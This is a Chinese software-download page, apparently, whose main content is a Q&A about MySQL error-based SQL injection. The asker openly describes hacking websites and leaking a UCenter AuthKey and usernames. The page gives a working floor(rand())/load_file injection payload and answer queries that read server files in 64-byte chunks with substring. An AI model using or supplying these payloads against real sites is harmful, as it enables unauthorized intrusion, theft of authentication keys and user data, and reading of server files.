- 1. DVDFab Passkey(輕松解決DVD受限制問題) V8.0.3.0 ...
- 2. UUSee網(wǎng)絡(luò)電視去廣告補(bǔ)丁(修正不能顯示播放列表問題...
- 3. MySQL(for Windows 32Bit)官方最新下載 V5.5.13
- 4. MySQL(for Windows 64Bit)最新官方下載 V5.5.13
- 5. UScreen(解決WIN7下游戲黑邊問題) V1.0.0.0
- 6. 迅游版迅雷網(wǎng)游加速器(解決網(wǎng)游中延時(shí)高、登錄難、...
- 7. phpMyAdmin(通過互聯(lián)網(wǎng)控制操作MYSQL的軟件) V3.4....
- 8. Access與MYSQL互轉(zhuǎn) Access2MSSQL PRO v3.0.0 英文綠...
- 9. phpMyAdmin 3.4.0 RC2 多語綠色版_很方便的網(wǎng)絡(luò)遠(yuǎn)M...
- 10. 旺財(cái)(有效解決開店貨源問題) V 1.31 簡(jiǎn)體中文免費(fèi)...
關(guān)于Mysql報(bào)錯(cuò)注入的幾個(gè)問題
No.1:Mysql報(bào)錯(cuò)注入最多能夠顯示多少字節(jié)呢?我Inject到的UC的AuthKey爆出62位一共應(yīng)該64位
No.2:爆出的用戶名中文和特殊符號(hào)顯示亂碼,用Hex()轉(zhuǎn)換了下爆出來再轉(zhuǎn)回去的時(shí)候依然亂碼,怎么解決?你知道國內(nèi)很多SB愛用各種怪異的符號(hào)做用戶名,嚴(yán)重影響日站的進(jìn)度。。
No.3:能否用報(bào)錯(cuò)注入Load_File(),我沒有成功語句如下:
and (select 1 from(select count(*),concat((select (select load_file(0x.........)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
1. 64 位,但是許多報(bào)錯(cuò)注入都會(huì)在前后加上特別符號(hào),以方便分辨,如[],就變成62位了,可以使用substring來處理
2. 如圖:
3. 同樣使用substring 以64為1單位慢慢讀, 最好就是寫個(gè)循環(huán)來讀
Select concat(substring(load_file(0x....),1,64)) FROM uc_applications limit 0,1
Select concat(substring(load_file(0x....),65,64)) FROM uc_applications limit 0,1
Select concat(substring(load_file(0x....),129,64)) FROM uc_applications limit 0,1
- 1. 關(guān)于ASP中大字段在Form中Post出錯(cuò)的解析
- 2. 關(guān)于在ASP程序頁面中插入excel文件的實(shí)例代碼分享
- 3. 關(guān)于Session與HashTable制作購物車的簡(jiǎn)單實(shí)例代碼分...
- 4. 關(guān)于ASP控制圖片顯示大小的實(shí)例代碼分享
- 5. 關(guān)于ASP組件上傳的三種機(jī)制
- 6. 關(guān)于ASP實(shí)現(xiàn)上傳圖片功能的原理及示例說明
- 7. WINDOWS7下關(guān)于文件與程序“聯(lián)姻”的解決方法
- 8. 關(guān)于網(wǎng)站默認(rèn)程序中容易遭到攻擊的危險(xiǎn)文件介紹
- 9. 關(guān)于ASP中時(shí)間函數(shù)的詳細(xì)說明
- 10. 關(guān)于PHP Parse Error: syntax error, unexpected $...